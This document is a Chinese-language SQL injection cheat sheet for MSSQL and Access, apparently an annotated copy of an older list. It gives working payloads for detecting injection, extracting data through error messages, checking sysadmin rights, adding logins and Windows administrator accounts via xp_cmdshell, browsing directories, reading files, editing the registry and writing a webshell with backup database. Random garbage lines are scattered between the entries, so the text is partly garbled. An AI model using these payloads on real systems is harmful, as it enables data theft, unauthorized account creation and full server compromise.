1.判断是否有注入: ;and 1=1 (页面应正常) 与 ;and 1=2 (页面应异常或无结果),两者返回不同即说明参数被拼进了 SQL。
2.初步判断是否是mssql: ;and user>0 (user 返回 nvarchar 类型的当前数据库用户名,与整数比较会触发类型转换错误,mssql 的报错信息中会直接带出该用户名)
n{qw ]/
3.注入参数是字符型时: 'and [查询条件] and ''=' (开头的单引号闭合原语句的引号,末尾的 ''=' 与原语句剩下的闭合引号拼成 ''='' 恒真)
0%&fUz36E6
4.搜索功能(LIKE '%...%')没过滤参数时: 'and [查询条件] and '%25'=' (%25 经 URL 解码后为 %,与原语句末尾的 %' 拼成 '%'='%' 恒真)
=?I1V#.
5.判断数据库系统(通过各自特有的系统表是否可查来区分)
gqHH Hh
;and (select count(*) from sysobjects)>0   成立则为 mssql (sysobjects 是 SQL Server 的系统表)
nkCRe
;and (select count(*) from msysobjects)>0   access (MSysObjects 是 Access 的系统表;注意通过 Web 应用查询它常因没有读权限而报错,这种特有的报错本身也可作为 Access 的特征)
(X`t"*y"
;2xXX,'R7
EDa08+Y
6.猜表名(原文称“猜数据库”,但 from 后面实际是表名): ;and (select Count(*) from [表名])>0 (表存在且至少有一行记录时成立)
*C:q _/
7.猜字段名: ;and (select Count(字段名) from 表名)>0 (字段不存在会报错或页面异常;注意 Count(字段名) 只统计非 NULL 的值,该列全为 NULL 时也不成立)
fXXm@tMx>
8.猜字段值的长度: ;and (select top 1 len(字段名) from 表名)>0 (逐步增大右侧数字直到不成立;top 1 不带 order by 时取到哪一行并不确定,最好加 where 条件锁定目标行)
"|l
oSf@
9.(1)猜字段的ascii值(access)
2AdHj&XE
;and (select top 1 asc(mid(字段名,1,1)) from 表名)>0 (mid 的第二个参数是字符位置,逐位递增;右侧的数字用二分法逼近即可得到该位的 ascii 值)
0or6_y6
(2)猜字段的ascii值(mssql)
mKl
pS|JDMo
;and (select top 1 unicode(substring(字段名,1,1)) from 表名)>0 (mssql 用 substring/unicode 代替 Access 的 mid/asc;unicode() 对 nvarchar 列同样适用,ascii() 只适合单字节字符)
;ZqD60%\
10.测试当前连接的权限(mssql): IS_SRVROLEMEMBER 返回 1/0/NULL,下列语句成立即表示当前登录属于该固定服务器角色
aY1#K6(y
"6Hjji@A
"*>QxA%c4
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--   (sysadmin 成立时后面第 11~14 条的操作才有可能执行)
C7*Yg$`{
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
PRf\6
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
dU04/]modD
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
{D2d({7
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
TXk"[>,:H
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
NN pa69U
;and 1=(select IS_MEMBER('db_owner'));--   (IS_MEMBER 判断的是当前数据库内的角色,而不是服务器角色)
E6&uZr
+WEO]q?K
93p9?4;n-
11.添加mssql登录和系统帐户(以下语句都需要 sysadmin 权限;xp_cmdshell 在较新版本中默认被禁用,需先确认可用)
&)'kX
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,password,username;--   (sp_password 的参数顺序是 旧密码,新密码,登录名;原文把用户名和密码的位置写反了)
H(ftOd.y
;exec master.dbo.sp_addsrvrolemember username,sysadmin;--   (参数顺序是 @loginame,@rolename,先登录名再角色名;原文顺序相反)
+z/73s0~
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--   (原文 /workstations:* 与 /times:all 之间缺少空格,命令会执行失败)
_"e(
^yiK
;exec master.dbo.xp_cmdshell 'net user username password /add';--   (在数据库服务器本机添加系统帐户,不一定是 Web 服务器)
n#AH@`&i
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--   (加入本地 administrators 组)
Cr\/<zy1-e
V\lF:3C
Qz90 mb
12.(1)遍历目录
ON=ley
;create table dirs(paths varchar(100), id int)   (xp_dirtree 返回 子目录名,深度 两列,与这两列对应;目录名超过 100 字符时插入会因截断报错,可适当放大长度)
vP;tgW9Qk
;insert dirs exec master.dbo.xp_dirtree 'c:\'   (把 c:\ 的目录树写入 dirs 表;遍历的是数据库服务器本机的磁盘)
zGsol
/|^^v DL
;and (select top 1 paths from dirs)>0   (varchar 与整数比较触发转换错误,从报错信息中读出目录名)
GnHf9
JrR
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>0   (原文末尾的 >) 是 >0 的笔误;每次把已得到的值追加进 not in 列表,即可逐条取出其余目录名)
UVRV7^eTe
^rb7`s#G
|"&4"nwa
(2)遍历目录
<}>-ip?
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--   (建 4 列是为了接住下面 xp_availablemedia 的 4 列输出)
S
;insert temp exec master.dbo.xp_availablemedia;--   获得当前所有驱动器(返回 4 列,故不指定列名直接插入)
XSIO0ep
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--   获得子目录列表(xp_subdirs 只返回一列)
6h"?3w
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--   获得所有子目录的目录树结构(xp_dirtree 返回 子目录名,深度 两列)
j>=".^J
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--   查看文件的内容(读取的是数据库服务器上的文件,之后用前面的报错方式逐行取出)
5%$kAJZC-
nr6[rq
g5]DA.&(
13.mssql中操作注册表的扩展存储过程(均在 master 库中,一般需要 sysadmin 权限)
_e^V\O>
xp_regenumvalues 注册表根键, 子键
~0t'+.
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run'   以多个记录集方式返回该子键下的所有键值
RLr-xg$K-t
xp_regread 根键,子键,键值名
pfIvBU?
;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir'   返回指定键值的内容
ZuON@ (
xp_regwrite 根键,子键, 值名, 值类型, 值
}e6:&`a xD
值类型常用两种: REG_SZ 表示字符串,REG_DWORD 表示整型
l0,O4k2 '
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello'   写入注册表(写入能否成功取决于 SQL Server 服务帐户对该键的权限)
.
9]9(o
xp_regdeletevalue 根键,子键,值名
B) iJH
;exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName'   删除某个值
auv\fR :
;exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey'   删除键,包括该键下所有值
:H7 "W<
1A
*8Jnw
{hR23eE)#
14.用 mssql 的 backup 写出 webshell(需要 sysadmin、db_owner 或 db_backupoperator 权限;文件由 SQL Server 服务进程写在数据库服务器本机,服务帐户须对目标目录有写权限)
1 ErYob.p
use model   (注意: model 是新建数据库的模板库,在其中建的表会被之后所有新建的数据库继承,用完应 drop table cmd 清理)
&ICO{#v5
create table cmd(str image);
{,X(fJ
insert into cmd(str) values ('');   ('' 处填入要写出的 ASP 代码)
w9BH>56/"
backup database model to disk='c:\l.asp';   (生成的是带备份头的二进制文件,ASP 代码夹在其中;路径须是数据库服务器上可被 Web 访问的目录。backup 默认为 noinit,目标文件已存在时会追加而不是覆盖,需要覆盖时加 with init)
HBu>BSv:
bvKi0-
}2{#=Elh
15.mssql内置函数(下列 >0 比较都是利用字符串与整数的转换错误把值带进报错信息)
Ky|0IKE8Z
;and (select @@version)>0   爆出 @@version(SQL Server 的版本字符串,其中也包含所运行的 Windows 版本信息)
%mJ)pMV
;and user_name()='dbo'   判断当前连接是否以 dbo 身份使用当前数据库(sa 会映射为 dbo,但任何数据库所有者也会映射为 dbo,成立并不等于就是 sa;要确认是否 sa/sysadmin 应用第 10 条的 IS_SRVROLEMEMBER('sysadmin'),或比较 system_user)
SfR_#"Uu
;and (select user_name())>0   爆出当前数据库用户名(user_name 返回的是数据库用户,登录名要用 system_user)
X35hLp8 M
;and (select db_name())>0   爆出当前连接的数据库名
G_@H:4$3
4RNzh``u
`pr,lL
16.简洁的webshell(与第 14 条相同,只是输出到 Web 目录 g:\wwwtest\;同样要注意 model 库遗留表和服务帐户写权限的问题)
&iivSc;#
use model
{s]eXc]K}
create table cmd(str image);
e$Ej7_.#;
insert into cmd(str) values ('');   ('' 处填入要写出的 ASP 代码)
UWp(3FQ
backup database model to disk='g:\wwwtest\l.asp';   (g:\wwwtest\ 必须是数据库服务器本机上的目录;文件已存在时默认追加,需要覆盖时加 with init)